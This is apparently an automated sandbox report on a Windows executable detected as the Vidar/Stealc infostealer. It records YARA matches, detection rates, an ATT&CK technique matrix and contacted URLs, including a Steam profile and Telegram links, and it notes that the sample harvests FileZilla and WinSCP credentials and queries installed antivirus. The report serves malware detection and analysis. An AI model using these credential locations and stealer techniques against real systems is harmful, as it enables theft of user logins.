                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_010094F0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0100AF34
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_01006F3C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: EnumSystemLocalesA,0_2_0100AFF6
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_01004E83
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFBA48 lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,0_2_00FFBA48
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF0E76 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00FF0E76
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF0F51 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00FF0F51
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.000000000394E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Stealc
                            Source: Yara matchFile source: njrtdhadawt.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: njrtdhadawt.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

                            Remote Access Functionality

                            barindex
                            Yara detected Stealc
                            Source: Yara matchFile source: njrtdhadawt.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: njrtdhadawt.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.njrtdhadawt.exe.fe0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: njrtdhadawt.exe PID: 6420, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		1
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		2
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API                            		1
                            Create Account                            		211
                            Process Injection                            		3
                            Obfuscated Files or Information                            		1
                            Credentials in Registry                            		1
                            Account Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            DLL Side-Loading                            		Security Account Manager3
                            File and Directory Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            File Deletion                            		NTDS55
                            System Information Discovery                            		Distributed Component Object ModelInput Capture13
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Masquerading                            		LSA Secrets251
                            Security Software Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                            Process Injection                            		DCSync12
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                            Application Window Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                            System Owner/User Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            njrtdhadawt.exe71%ReversingLabsWin32.Trojan.Vidar
                            njrtdhadawt.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\chrome.dll75%ReversingLabsWin32.Trojan.Seheq

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://community.cloudflare.steamstat0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            steamcommunity.com
                            		104.102.49.254
                            		truefalse
                              		high
                              t.me
                              		149.154.167.99
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://steamcommunity.com/profiles/76561199794498376false
                                  		high
                                  https://t.me/asg7rdfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&amnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                      		high
                                      https://player.vimeo.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=englinjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                          		high
                                          https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&ampnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                            		high
                                            https://steamcommunity.com/?subsection=broadcastsnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                              		high
                                              https://steamcommunity.com/login/home/?goto=profiles%2F7656119979449837676561199794498376[1].htm.0.drfalse
                                                		high
                                                https://store.steampowered.com/subscriber_agreement/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                  		high
                                                  https://www.gstatic.cn/recaptcha/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://telegram.org/img/t_logo_2x.pngnjrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.valvesoftware.com/legal.htmnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                        		high
                                                        https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&anjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                          		high
                                                          https://www.youtube.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Snjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                		high
                                                                https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.jsnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                  		high
                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=englnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                    		high
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbacknjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                      		high
                                                                      https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltinjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                        		high
                                                                        https://s.ytimg.com;njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                            		high
                                                                            https://steam.tv/njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://store.steampowered.com/privacy_agreement/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                		high
                                                                                https://store.steampowered.com/points/shop/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                  		high
                                                                                  https://steamcommunity.com/profiles/76561199794498376/badgesnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                    		high
                                                                                    https://sketchfab.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lv.queniujq.cnnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.youtube.com/njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://store.steampowered.com/privacy_agreement/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                            		high
                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=englinjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                              		high
                                                                                              https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.cloudflare.steamstatnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=englinjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                  		high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com/Ynjrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://t.me/zjnjrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                          		high
                                                                                                          https://www.google.com/recaptcha/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://checkout.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbSnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                		high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                  		high
                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                    		high
                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/;njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/about/76561199794498376[1].htm.0.drfalse
                                                                                                                          		high
                                                                                                                          https://community.cloudflare.steamstatic.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/my/wishlist/njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                              		high
                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=76561199794498376[1].htm.0.drfalse
                                                                                                                                		high
                                                                                                                                https://web.telegram.orgnjrtdhadawt.exe, 00000000.00000003.1510994054.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://help.steampowered.com/en/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/market/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/news/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.rs/getrandom#nodejs-es-module-supportnjrtdhadawt.exe, chrome.dll.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englisnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/profiles/76561199794498376)njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
